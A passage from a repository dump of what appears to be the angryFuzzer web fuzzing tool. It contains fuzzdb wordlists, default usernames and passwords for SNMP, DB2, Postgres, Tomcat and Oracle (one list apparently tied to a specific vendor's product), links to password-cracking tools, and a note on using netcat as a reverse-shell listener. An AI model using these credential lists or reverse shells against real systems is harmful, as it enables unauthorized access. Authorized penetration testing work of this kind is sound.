    46 | 65 | * for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888" 66 |
    67 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-misc/accidental_profanity.txt: -------------------------------------------------------------------------------- 1 | Scunthorpe General Hospital 2 | Penistone Community Church 3 | Lightwater Country Park 4 | Jimmy Clitheroe 5 | Horniman Museum 6 | shitake mushrooms 7 | RomansInSussex.co.uk 8 | http://www.cum.qc.ca/ 9 | Craig Cockburn, Software Specialist 10 | Linda Callahan 11 | Dr. Herman I. Libshitz 12 | magna cum laude 13 | Super Bowl XXX 14 | medieval erection of parapets 15 | evaluate 16 | mocha 17 | expression 18 | Arsenal canal 19 | classic 20 | Tyson Gay 21 | Dick Van Dyke 22 | basement 23 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-misc/common-http-ports.txt: -------------------------------------------------------------------------------- 1 | 66 2 | 80 3 | 81 4 | 443 5 | 445 6 | 457 7 | 1080 8 | 1100 9 | 1241 10 | 1352 11 | 1433 12 | 1434 13 | 1521 14 | 1944 15 | 2301 16 | 3128 17 | 3306 18 | 4000 19 | 4001 20 | 4002 21 | 4100 22 | 5000 23 | 5432 24 | 5800 25 | 5801 26 | 5802 27 | 6346 28 | 6347 29 | 7001 30 | 7002 31 | 8080 32 | 8888 33 | 30821 34 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-misc/numeric.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 1.00 4 | $1.00 5 | 1/2 6 | 1E2 7 | 1E02 8 | 1E+02 9 | -1 10 | -1.00 11 | -$1.00 12 | -1/2 13 | -1E2 14 | -1E02 15 | -1E+02 16 | 1/0 17 | 0/0 18 | -2147483648/-1 19 | -9223372036854775808/-1 20 | -0 21 | -0.0 22 | +0 23 | +0.0 24 | 0.00 25 | 0..0 26 | . 27 | 0.0.0 28 | 0,00 29 | 0,,0 30 | , 31 | 0,0,0 32 | 0.0/0 33 | 1.0/0.0 34 | 0.0/0.0 35 | 1,0/0,0 36 | 0,0/0,0 37 | --1 38 | - 39 | -. 
40 | -, 41 | 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 42 | NaN 43 | Infinity 44 | -Infinity 45 | INF 46 | 1#INF 47 | -1#IND 48 | 1#QNAN 49 | 1#SNAN 50 | 1#IND 51 | 0x0 52 | 0xffffffff 53 | 0xffffffffffffffff 54 | 0xabad1dea 55 | 123456789012345678901234567890123456789 56 | 1,000.00 57 | 1 000.00 58 | 1'000.00 59 | 1,000,000.00 60 | 1 000 000.00 61 | 1'000'000.00 62 | 1.000,00 63 | 1 000,00 64 | 1'000,00 65 | 1.000.000,00 66 | 1 000 000,00 67 | 1'000'000,00 68 | 01000 69 | 08 70 | 09 71 | 2.2250738585072011e-308 72 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-misc/wordlist-alphanumeric-case.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | a 12 | b 13 | c 14 | d 15 | e 16 | f 17 | g 18 | h 19 | i 20 | j 21 | k 22 | l 23 | m 24 | n 25 | o 26 | p 27 | q 28 | r 29 | s 30 | t 31 | u 32 | v 33 | w 34 | x 35 | y 36 | z 37 | A 38 | B 39 | C 40 | D 41 | E 42 | F 43 | G 44 | H 45 | I 46 | J 47 | K 48 | L 49 | M 50 | N 51 | O 52 | P 53 | Q 54 | R 55 | S 56 | T 57 | U 58 | V 59 | W 60 | X 61 | Y 62 | Z 63 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-misc/wordlist-common-snmp-community-strings.txt: -------------------------------------------------------------------------------- 1 | public 2 | private 3 | 0 4 | 0392a0 5 | 1234 6 | 2read 7 | 4changes 8 | ANYCOM 9 | Admin 10 | C0de 11 | CISCO 12 | CR52401 13 | IBM 14 | ILMI 15 | Intermec 16 | NoGaH$@! 
17 | OrigEquipMfr 18 | PRIVATE 19 | PUBLIC 20 | Private 21 | Public 22 | SECRET 23 | SECURITY 24 | SNMP 25 | SNMP_trap 26 | SUN 27 | SWITCH 28 | SYSTEM 29 | Secret 30 | Security 31 | s!a@m#n$p%c 32 | Switch 33 | System 34 | TENmanUFactOryPOWER 35 | TEST 36 | access 37 | adm 38 | admin 39 | agent 40 | agent_steal 41 | all 42 | all private 43 | all public 44 | apc 45 | bintec 46 | blue 47 | c 48 | cable-d 49 | canon_admin 50 | cc 51 | cisco 52 | community 53 | core 54 | debug 55 | default 56 | dilbert 57 | enable 58 | field 59 | field-service 60 | freekevin 61 | fubar 62 | guest 63 | hello 64 | hp_admin 65 | ibm 66 | ilmi 67 | intermec 68 | internal 69 | l2 70 | l3 71 | manager 72 | mngt 73 | monitor 74 | netman 75 | network 76 | none 77 | openview 78 | pass 79 | password 80 | pr1v4t3 81 | proxy 82 | publ1c 83 | read 84 | read-only 85 | read-write 86 | readwrite 87 | red 88 | regional 89 | rmon 90 | rmon_admin 91 | ro 92 | root 93 | router 94 | rw 95 | rwa 96 | san-fran 97 | sanfran 98 | scotty 99 | secret 100 | security 101 | seri 102 | snmp 103 | snmpd 104 | snmptrap 105 | solaris 106 | sun 107 | superuser 108 | switch 109 | system 110 | tech 111 | test 112 | test2 113 | tiv0li 114 | tivoli 115 | trap 116 | world 117 | write 118 | xyzzy 119 | yellow 120 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-misc/wordlist-dna.txt: -------------------------------------------------------------------------------- 1 | a 2 | t 3 | c 4 | g 5 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/db2/db2_default_pass.txt: -------------------------------------------------------------------------------- 1 | db2inst1 2 | dasusr1 3 | db2fenc1 4 | db2pass 5 | db2pw 6 | db2password 7 | admin 8 | db2admin 9 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/db2/db2_default_user.txt: 
-------------------------------------------------------------------------------- 1 | db2inst1 2 | dasusr1 3 | db2fenc1 4 | admin 5 | db2admin 6 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/db2/db2_default_userpass.txt: -------------------------------------------------------------------------------- 1 | db2inst1 db2inst1 2 | db2inst1 db2pass 3 | db2inst1 db2pw 4 | db2inst1 db2password 5 | dasusr1 dasusr1 6 | db2fenc1 db2fenc1 7 | db2admin db2admin 8 | 9 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/generic-listpairs/http_default_pass.txt: -------------------------------------------------------------------------------- 1 | admin 2 | password 3 | manager 4 | letmein 5 | cisco 6 | default 7 | root 8 | apc 9 | pass 10 | security 11 | user 12 | system 13 | sys 14 | none 15 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/generic-listpairs/http_default_userpass.txt: -------------------------------------------------------------------------------- 1 | # needs help 2 | connect connect 3 | sitecom sitecom 4 | admin 1234 5 | cisco cisco 6 | cisco sanfran 7 | private private 8 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/generic-listpairs/http_default_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | root 4 | cisco 5 | apc 6 | pass 7 | security 8 | user 9 | system 10 | sys 11 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/oracle/_hci_oracle_passwords.txt: -------------------------------------------------------------------------------- 1 | "AMBU,hacschema" 2 | "QUEUE_USER,qmanager" 3 | "SYS,alLp0ver2" 4 | "SYSTEM,urA7mvP" 5 | "CHANGEMGR,datacontrol" 6 | "CCDEV,ccdev" 7 | "CCDBA,ccnulls 
" 8 | "CCDATA,ccdata" 9 | "CCFORMS,ccforms" 10 | "CCINTERFACE,ccinterface" 11 | "MCKHEO,mckheo" 12 | "CCREL,ccrel" 13 | "CCQUERY,ccquery" 14 | "CDXWEB,winplu5" 15 | "DRUG1,fdb3schema" 16 | "DRUG2,fdb3schema" 17 | "enc_ent,encent" 18 | "ENT,entpazz" 19 | "ENT_CONFIG,ent_configpazz" 20 | "ADF,adfpazz" 21 | "INF,infpazz" 22 | "INF_CONFIG,inf_configpazz" 23 | "SDM,sdmpazz" 24 | "STRMADM,pazzw0rd" 25 | "ENT_AUD,pazzw0rd" 26 | "ENT_ARCH,pazzw0rd" 27 | "POC_ARCH,pazzw0rd" 28 | "POC_AQ,qmanager" 29 | "INF_AQ,qmanager" 30 | "DATAMGR,datamgr" 31 | "CCUSER,bueno" 32 | "ALERTS,monitorhca" 33 | "HCALERTS,alertsuser" 34 | "AM,ampazz" 35 | "AM_AUD,pazzw0rd" 36 | "AUD,audpazz" 37 | "TMF,tmfpazz" 38 | "MN,mnpazz" 39 | "EH,ehpazz" 40 | "NG,ngpazz" 41 | "DM,dmpazz" 42 | "DMTOOL,dmtoolpazz" 43 | "STG_DMT,stg_dmtpazz" 44 | "WRL,wrlpazz" 45 | "NOTES,notespazz" 46 | "REPORTS,reportspazz" 47 | "ICONS,iconspazz" 48 | "BS,bspazz" 49 | "QZ,qzpazz" 50 | "RM,rmpazz" 51 | "RM_AUD,pazzw0rd" 52 | "COMMGR,commgrpazz" 53 | "OPSERVICE,opservicepazz" 54 | "SEC_CONFIG,sec_configpazz" 55 | "CTXSYS,ctxsyspazz" 56 | "OLOGY,ologypazz" 57 | "OLOGY_CONFIG,ology_configpazz" 58 | "DOC,docpazz" 59 | "DOC_CONFIG,doc_configpazz" 60 | "PORTAL,portal" 61 | "PORTAL_INSTALL,portal_install" 62 | "EBIDBADMIN,ebidbadmin" 63 | "DESIGN_OWNER,owb" 64 | "OWB_RUNTIME_REPOSITORY,owb" 65 | "RUNTIME_A_USER,owb" 66 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/passwds/phpbb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/postgres/postgres_default_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | tiger 3 | postgres 4 | password 5 
| admin 6 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/postgres/postgres_default_user.txt: -------------------------------------------------------------------------------- 1 | postgres 2 | scott 3 | admin 4 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/postgres/postgres_default_userpass.txt: -------------------------------------------------------------------------------- 1 | postgres postgres 2 | postgres password 3 | postgres admin 4 | admin admin 5 | admin password 6 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/readme.txt: -------------------------------------------------------------------------------- 1 | 2 | various notes 3 | 4 | leetspeak filter 5 | cat plain.wordlist | sed -e 's/a/4/g' -e 's/e/3/g' -e 's/i/1/g' -e 's/o/0/g' -e 's/s/5/g' -e 's/t/7/g' > l337.wordlist 6 | 7 | more wordlists 8 | ftp://ftp.ox.ac.uk/pub/wordlists/ 9 | http://theargon.com/achilles/wordlists/ 10 | http://www.totse.com/en/hack/word_lists/index.html 11 | http://www.outpost9.com/files/WordLists.html 12 | http://packetstormsecurity.org/Crackers/wordlists/ 13 | 14 | passwd brute force tools 15 | 16 | cupp - passwd profiler 17 | http://www.remote-exploit.org/?page_id=506 18 | 19 | awlg - associative wordlist generator 20 | http://awlg.org/index.gen 21 | 22 | thc-hydra 23 | http://freeworld.thc.org/thc-hydra/ 24 | 25 | cain & abel 26 | http://www.oxid.it/cain.html 27 | 28 | jtr 29 | http://www.openwall.com/john/ 30 | 31 | lcp - free l0phtcrack replacement 32 | http://www.lcpsoft.com/english/download.htm 33 | 34 | 35 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/tomcat/tomcat_mgr_default_pass.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | role1 4 | root 5 | 
tomcat 6 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/tomcat/tomcat_mgr_default_userpass.txt: -------------------------------------------------------------------------------- 1 | j2deployer j2deployer 2 | ovwebusr OvW*busr1 3 | cxsdk kdsxc 4 | root owaspbwa 5 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/tomcat/tomcat_mgr_default_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | role1 4 | root 5 | tomcat 6 | both 7 | -------------------------------------------------------------------------------- /fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt: -------------------------------------------------------------------------------- 1 | 4Dgifts 2 | EZsetup 3 | OutOfBox 4 | ROOT 5 | adm 6 | admin 7 | administrator 8 | anon 9 | auditor 10 | avahi 11 | avahi-autoipd 12 | backup 13 | bbs 14 | bin 15 | checkfs 16 | checkfsys 17 | checksys 18 | cmwlogin 19 | couchdb 20 | daemon 21 | dbadmin 22 | demo 23 | demos 24 | diag 25 | distccd 26 | dni 27 | fal 28 | fax 29 | ftp 30 | games 31 | gdm 32 | gnats 33 | gopher 34 | gropher 35 | guest 36 | haldaemon 37 | halt 38 | hplip 39 | informix 40 | install 41 | irc 42 | kernoops 43 | libuuid 44 | list 45 | listen 46 | lp 47 | lpadm 48 | lpadmin 49 | lynx 50 | mail 51 | man 52 | me 53 | messagebus 54 | mountfs 55 | mountfsys 56 | mountsys 57 | news 58 | noaccess 59 | nobody 60 | nobody4 61 | nuucp 62 | nxpgsql 63 | operator 64 | oracle 65 | popr 66 | postgres 67 | postmaster 68 | printer 69 | proxy 70 | pulse 71 | rfindd 72 | rje 73 | root 74 | rooty 75 | saned 76 | service 77 | setup 78 | sgiweb 79 | sigver 80 | speech-dispatcher 81 | sshd 82 | sym 83 | symop 84 | sync 85 | sys 86 | sysadm 87 | sysadmin 88 | sysbin 89 | syslog 90 | system_admin 91 | trouble 92 | udadmin 93 | ultra 94 | umountfs 95 | umountfsys 96 | umountsys 97 | unix 
98 | us_admin 99 | user 100 | uucp 101 | uucpadm 102 | web 103 | webmaster 104 | www 105 | www-data 106 | xpdb 107 | xpopr 108 | zabbix 109 | -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | __all__ = ['colors'] -------------------------------------------------------------------------------- /lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/lib/__init__.pyc -------------------------------------------------------------------------------- /lib/colors.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | class colors: 4 | """ANSI escape-sequence constants (ESC [ ... m) exposed as class attributes. CYAN is assigned twice in this body; the later value (SGR 96) replaces the earlier one (SGR 1;36). RESET is SGR 0. """ 5 | BLUE = '\033[1;34m' 6 | GREEN = '\033[1;32m' 7 | RED = '\033[1;31m' 8 | WHITE = '\033[1;37m' 9 | CYAN = '\033[1;36m' 10 | YELLOW = '\033[1;33m' 11 | CRIMSON = '\033[1;38m' 12 | RESET = '\033[0m' 13 | IND = '\033[04m' 14 | LIGHTRED = '\033[91m' 15 | CYAN = '\033[96m' 16 | MAGANTA = '\033[95m' 17 | -------------------------------------------------------------------------------- /lib/colors.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/lib/colors.pyc -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | optparse-pretty 3 | urlparse2 4 | getopts 5 | --------------------------------------------------------------------------------